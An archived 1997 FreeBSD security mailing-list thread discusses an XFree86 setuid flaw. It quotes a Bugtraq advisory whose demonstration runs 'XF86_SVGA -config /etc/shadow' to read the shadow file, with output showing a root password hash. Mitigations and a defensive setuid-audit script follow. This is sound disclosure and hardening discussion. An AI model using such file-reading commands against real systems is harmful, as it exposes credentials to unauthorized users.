From owner-freebsd-security Sun Nov 23 10:27:01 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id KAA22791 for security-outgoing; Sun, 23 Nov 1997 10:27:01 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from super-g.inch.com (super-g.com [207.240.140.161]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id KAA22786; Sun, 23 Nov 1997 10:26:58 -0800 (PST) (envelope-from spork@super-g.com)
Received: from localhost (localhost [127.0.0.1]) by super-g.inch.com (8.8.7/8.8.5) with SMTP id NAA02291; Sun, 23 Nov 1997 13:20:20 -0500 (EST)
Date: Sun, 23 Nov 1997 13:20:20 -0500 (EST)
From: spork
X-Sender: spork@super-g.inch.com
To: David Dawes
cc: Philippe Regnauld, freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: "XFree86 insecurity"
In-Reply-To: <19971122192453.17451@rf900.physics.usyd.edu.au>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

A quick fix I already had in place from the old xterm exploits was to put
all the people that use X (well, just me) in a group and make the X
binaries with suid bits only executable by that group rather than
world-execute. While it's not truly a fix, it does limit your
vulnerability. I've yet to play with XDM...

Charles Sprickman
spork@super-g.com
----
"I'm not a prophet or a stone-age man
Just a mortal with potential of a superman
I'm living on"
-DB

On Sat, 22 Nov 1997, David Dawes wrote:

> On Sat, Nov 22, 1997 at 08:23:50AM +0100, Philippe Regnauld wrote:
>
> We (XFree86) are aware of this one. I agree with the recommendation of
> removing the setuid bit and using xdm to start the Xserver, and if you
> have XFree86 on a machine where this problem is significant, you should
> consider doing this.
>
> The fix is to disable the '-config' Xserver option. This will be removed
> in our next release, and also in the next X11 release from The Open
> Group. It was only added to get around problems on OS's with small
> command line length limits, and should never have been enabled for most
> Unix-like OSs. The problem isn't XFree86-specific. It affects any
> platform using X11R6 XC/TOG code where the Xserver is installed setuid
> root (although on non-XFree86 platforms you may need to be a little more
> inventive with the use of the -config option).
>
> David
>
> >Cute one.
> >
> >-----Forwarded message from shegget -----
> >
> >Date: Fri, 21 Nov 1997 18:35:36 +0000
> >From: shegget
> >Subject: XFree86 insecurity
> >To: BUGTRAQ@NETSPACE.ORG
> >
> > plaguez security advisory n.10
> >
> > XFree86 insecurity
> >
> >
> >Program: XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)
> >
> >Version: Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
> > Other versions as well.
> >
> >OS: All
> >
> >Impact: The XFree86 servers let you specify an alternate configuration
> > file and do not check whether you have rights to read it.
> > Any user can read files with root permissions.
> >
> >
> >hello,
> >just a short one to tell you about this "feature" I found in all default
> >XFree86 servers...
> >
> >Here it is:
> >
> >Script started on Sat Aug 23 15:32:36 1997
> >Loading /usr/lib/kbd/keytables/fr-latin1.map
> >[plaguez@plaguez plaguez]$ uname -a
> >Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
> >[plaguez@plaguez plaguez]$ ls -al /etc/shadow
> >-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow
> >[plaguez@plaguez bin]$ id
> >uid=502(plaguez) gid=500(users) groups=500(users)
> >[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
> >[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
> >Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
> >use: X [:] [option]
> >-a # mouse acceleration (pixels)
> >-ac disable access control restrictions
> >-audit int set audit trail level
> >-auth file select authorization file
> >bc enable bug compatibility
> >-bs disable any backing store support
> >-c turns off key-click
> >
> >... and so on. HINT: look at the first XF86_SVGA output line.
> >
> >
> >Patch:
> >------
> >
> >If you run xdm, you should consider removing the setuid bit of the
> >servers.
> >
> >If not, well, wait for the XFree86 Project to bring you a patch, since I'm
> >too lazy to find and fix it.
> >
> >
> >later,
> >
> >-plaguez
> >dube0866@eurobretagne.fr
> >
> >-----End of forwarded message-----
> >
> >--
> > -- Phil
> >
> > -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
>
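The interim mitigation spork describes (put the X users in a group and make the setuid X binaries executable only by that group) can be audited and applied with a short POSIX shell script. This is an added example, not code from the thread or from the XFree86 project; the directory and group name are assumptions, and on a real system you would point it at /usr/X11R6/bin and a group such as xusers.

```shell
#!/bin/sh
# Added example (not from the thread): find setuid binaries that are
# still world-executable, and restrict them to a dedicated group as
# described in the thread. Assumed invocation:
#   audit_setuid /usr/X11R6/bin
#   restrict_setuid /usr/X11R6/bin xusers

# Print every regular file under DIR that has the setuid bit set AND is
# executable by "other" (mode bits 4001 all present). These are the
# binaries any local user can run, which is the exposure the thread
# discusses.
audit_setuid() {
    dir=$1
    find "$dir" -type f -perm -4001 -print
}

# For each file reported by audit_setuid: change its group to GROUP and
# set mode 4710 (setuid, owner rwx, group x, no access for other).
# chgrp runs before chmod because an unprivileged chgrp clears the
# setuid bit on Linux; chmod 4710 then restores it along with the
# tightened permissions. Prints each file it changed.
restrict_setuid() {
    dir=$1
    group=$2
    audit_setuid "$dir" | while IFS= read -r f; do
        chgrp "$group" "$f" && chmod 4710 "$f" && printf '%s\n' "$f"
    done
}

# Count how many setuid files under DIR are still world-executable;
# zero means the mitigation is fully applied.
count_exposed() {
    audit_setuid "$1" | wc -l | tr -d ' '
}
```

A later `audit_setuid` run over the same directory should print nothing; any new line means a package install or upgrade has reintroduced a world-executable setuid binary.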